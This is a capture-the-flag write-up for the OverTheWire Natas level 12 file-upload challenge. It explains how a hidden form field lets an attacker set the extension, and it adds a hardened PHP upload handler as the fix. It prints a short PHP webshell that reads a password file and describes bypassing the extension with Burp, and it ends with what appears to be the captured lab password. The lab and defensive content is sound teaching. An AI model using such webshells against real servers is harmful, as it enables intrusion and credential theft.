natas solution(12)
Natas Level 11 → Level 12
Username: natas12
URL: http://natas12.natas.labs.overthewire.org
This level is fairly easy, but it offers some insight about mindset. The first thing you see is a page where you choose a file and upload it, so we can try uploading a backdoor and see what happens. Write the payload:
<?php
passthru('cat /etc/natas_webpass/natas13');
?>
After uploading, the file turns out to have been renamed to xxxx.jpg, so it has clearly been tampered with. Without further ado, look at the source code:
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

function makeRandomPath($dir, $ext) {
    do {
        $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";
    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }
    return $string;
}
Looking at this, it does not seem to tamper with the extension anywhere, does it? That is what I find interesting and enlightening about this level. Let's look at this part again:
<?
if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);

    if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
}
?>

<form enctype="multipart/form-data" action="index.php" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="1000" />
    <input type="hidden" name="filename" value="<? print genRandomString(); ?>.jpg" />
    Choose a JPEG to upload (max 1KB):<br/>
    <input name="uploadedfile" type="file" /><br />
    <input type="submit" value="Upload File" />
</form>
You can see that the filename submitted with the form actually lives in a hidden input. That is the interesting part of this level 👉

Insight

When I skimmed the source, I assumed the so-called $_POST["filename"] referred to the name of the uploaded file, but that is not the case. You can clearly see that it is generated by the genRandomString function and then has the .jpg suffix appended.

In the past, once I got hold of the source I easily assumed I held the key 🔑. After stumbling on this level even with the source in hand, I realized that even with source code, psychological blind spots (misleading variable names) can still mislead you.

This time, when uploading, capture the request with Burp and change the extension to .php.
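For contrast, here is how the same handler looks once the root cause is fixed. This is an added example, not the Natas level's own code: the client-supplied "filename" field is ignored entirely, the extension is chosen server-side from an allowlist after inspecting the file's actual content with the fileinfo extension, and the stored name is drawn from random_bytes() rather than mt_rand(). The function names handleUpload and safeExtensionFor, the ALLOWED_TYPES map and the "upload" directory are assumptions for this example.

```php
<?php
// Added example: hardened replacement for the natas12 upload handler.
// Assumed names: ALLOWED_TYPES, safeExtensionFor(), handleUpload().

// Only these detected MIME types are stored, and only with this extension.
// Nothing the browser sends (hidden field, original name, Content-Type) is trusted.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
];
const MAX_UPLOAD_BYTES = 1000;

function genRandomString(): string {
    // random_bytes() is a CSPRNG; mt_rand() in the original is not.
    return bin2hex(random_bytes(5)); // 10 hex characters
}

// Returns the allowlisted extension for the file's real content, or null.
function safeExtensionFor(string $tmpPath): ?string {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    return ALLOWED_TYPES[$mime] ?? null;
}

function handleUpload(array $files, string $dir): string {
    if (!isset($files['uploadedfile'])
        || $files['uploadedfile']['error'] !== UPLOAD_ERR_OK) {
        return "No file uploaded";
    }
    $tmp = $files['uploadedfile']['tmp_name'];
    if (!is_uploaded_file($tmp)) {
        return "Invalid upload";
    }
    if (filesize($tmp) > MAX_UPLOAD_BYTES) {
        return "File is too big";
    }

    // Extension comes from the detected content, never from the request.
    $ext = safeExtensionFor($tmp);
    if ($ext === null) {
        return "Only JPEG or PNG images are accepted";
    }

    do {
        $target = $dir . "/" . genRandomString() . "." . $ext;
    } while (file_exists($target));

    if (!move_uploaded_file($tmp, $target)) {
        return "There was an error uploading the file, please try again!";
    }

    // Escape before reflecting the path into HTML.
    $safe = htmlspecialchars($target, ENT_QUOTES, 'UTF-8');
    return "The file <a href=\"$safe\">$safe</a> has been uploaded";
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    echo handleUpload($_FILES, "upload");
}
?>
```

Content sniffing alone is not a complete defence (a valid JPEG can still carry PHP in its metadata), so the second layer is to make sure the upload directory can never execute scripts at all: keep it outside the web root, or disable the PHP engine for it in the web server configuration. With both in place, a renamed extension in the request no longer has anything to act on.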
jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY